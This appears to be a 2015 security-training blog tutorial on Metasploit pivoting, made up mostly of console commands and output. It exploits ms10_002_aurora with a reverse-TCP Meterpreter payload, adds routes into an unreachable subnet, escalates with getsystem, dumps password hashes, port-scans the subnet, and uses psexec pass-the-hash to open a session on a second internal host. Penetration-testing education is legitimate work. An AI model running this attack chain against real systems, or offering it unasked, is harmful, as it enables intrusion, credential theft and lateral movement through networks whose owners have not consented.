Ready to Start Your Career?

Metasploit: Routing Traffic from a Non-Routable Network

Multi Thinker's profile image

By: Multi Thinker

July 14, 2015

According to Offensive-Security:
Pivoting is the unique technique of using an instance (also referred to as a ‘plant’ or ‘foothold’) to be able to “move” around inside a network. Basically using the first compromise to allow and even aid in the compromise of other otherwise inaccessible systems.

In this scenario, we'll be using it for routing traffic from a normally non-routable network.

 For this, we'll use exploit "exploit/windows/browser/ms10_002_aurora"
msf > use exploit/windows/browser/ms10_002_aurora we need to set URIPATH with LHOSTmsf exploit(ms10_002_aurora) > set URIPATH /URIPATH => /msf exploit(ms10_002_aurora) > set PAYLOAD windows/meterpreter/reverse_tcpPAYLOAD => windows/meterpreter/reverse_tcpmsf exploit(ms10_002_aurora) > set LHOST xx.xx.xx.xxLHOST => xx.xx.xx.xx
 With a lookup on sessions, we have:
msf exploit(ms10_002_aurora) > sessions -lNow we need subnet mask and route discovery for that meterpreter > run autoroute -h[*] Usage: run autoroute [-r] -s subnet -n netmask[*] Examples:[*] run autoroute -s xx.x.x.x -n # Add a route to x.x.x.x/[*] run autoroute -s x.x.x.x # Netmask defaults to[*] run autoroute -s x.x.x.x/24 # CIDR notation is also okay[*] run autoroute -p # Print active routing table[*] run autoroute -d -s x.x.x.x # Deletes the x.x.x.x/ route[*] Use the "route" and "ipconfig" Meterpreter commands to learn about available routesmeterpreter > run autoroute -s x.x.x.x/24[*] Adding a route to x.x.x.x/[+] Added route to x.x.x.x/ via[*] Use the -p option to list all active routesmeterpreter > run autoroute -pActive Routing Table==================== Subnet Netmask Gateway ------ ------- ------- x.x.x.x Session 1
 Why did I do this? We need to route and act like that IP in the step session. Try typing ifconfig and you'll see your victim in your route. We need to use that IP, so I've routed that with subnet masks.Now, we need to access that system, too. Let's get it by typing getsytem and exploit with the pass the hash method recently explained.
meterpreter > system (via technique 1).meterpreter > run hashdump[*] Obtaining the boot key...[*] Calculating the hboot key using SYSKEY c2ec80f879c1123b5dc8d24f1xxe2c37a45...[*] Obtaining the user list and keys...[*] Decrypting user keys...[*] Dumping password hashes...Administrator:500:81cbcea8a9af9as3bbaad3b435b51404ee:561cbdae13dded5abd30aa94ddeb3cf52d:::Guest:501:aad3b435b51404eeaad3sd435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::HelpAssistant:1000:9a6ae26408b0629ddc621c90c897b42d:07a59dbe14e2ea9c4792e2f189e2de3a:::SUPPORT_s388945a0:1002:aad3b435b51404eeaad3b435b51das404ee:ebf9fa44b3204029db5a8a77f5350160:::Thinker:1004:81casbcea8a9af93bbaad3b435b51404ee:561cbdae13ed5aasbd30aa94ddeb3cf52d:::
We need to bind_tcp over the network. For that, we can use TCP exploit in meterpreter.
msf exploit(ms10_002_aurora) > use auxiliary/scanner/portscan/tcp msf auxiliary(tcp) > show optionsModule options: Name Current Setting Required Description ---- --------------- -------- ----------- CONCURRENCY 10 yes The number of concurrent ports to check per host FILTER no The filter string for capturing traffic INTERFACE no The name of the interface PCAPFILE no The name of the PCAP capture file to process PORTS 1-10000 yes Ports to scan (e.g. 22-25,80,110-900) RHOSTS yes The target address range or CIDR identifier SNAPLEN 65535 yes The number of bytes to capture THREADS 1 yes The number of concurrent threads TIMEOUT 1000 yes The socket connect timeout in milliseconds VERBOSE false no Display verbose outputmsf auxiliary(tcp) > set RHOSTS x.x.x.x/24RHOST => x.x.x.x/24msf auxiliary(tcp) > set PORTS 179,445PORTS => 179,445msf auxiliary(tcp) > set THREADS 20THREADS => 20msf auxiliary(tcp) > run[*] x.x.x.x:445 - TCP OPEN
Follow the steps to pass the hash and tcp_bind for pivoting:
msf auxiliary(tcp) > use exploit/windows/smb/psexec msf exploit(psexec) > show optionsModule options: Name Current Setting Required Description ---- --------------- -------- ----------- RHOST yes The target address RPORT 445 yes Set the SMB service port SMBDomain WORKGROUP no The Windows domain to use for authentication SMBPass no The password for the specified username SMBUser no The username to authenticate asExploit target: Id Name -- ---- 0 Automaticmsf exploit(psexec) > set RHOST x.x.x.xRHOST => x.x.x.xmsf exploit(psexec) > set SMBUser AdministratorSMBUser => Administratormsf exploit(psexec) > set SMBPass 81cbcea8a9af93bbaad3b435b51404ee:561cbdae13ed5abd30aa94ddeb3cf52dSMBPass => 81cbcea8a9af93bbaad3b435b51404ee:561cbdae13ed5abd30aa94ddeb3cf52dmsf exploit(psexec) > set PAYLOAD windows/meterpreter/bind_tcpPAYLOAD => windows/meterpreter/bind_tcpmsf exploit(psexec) > exploit[*] Connecting to the server...[*] Started bind handler[*] Authenticating to x.x.x.x:445|WORKGROUP as user 'Administrator'...[*] Uploading payload...[*] Created qANuICKyR.exe...[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:x.x.x.x[svcctl] ...[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:x.x.x.x[svcctl] ...[*] Obtaining a service manager handle...[*] Creating a new service (UOtrbJMd - "AuiSy")...[*] Closing service handle...[*] Opening service...[*] Starting the service...[*] Removing the service...[*] Closing service handle...[*] Deleting ssWSdV.exe...[*] Sending stage (749056 bytes)[*] Meterpreter session 2 opened ( -> x.x.x.x:4444) at Mon Jul 11 12:56:42 -0700 2015
 Voila! We've done it. Just type ipconfig to see that we are using our victim's connection and are connected to that system that wasn't normally connected (it was not on a LAN or any other connection ). -- Multi Thinker
Schedule Demo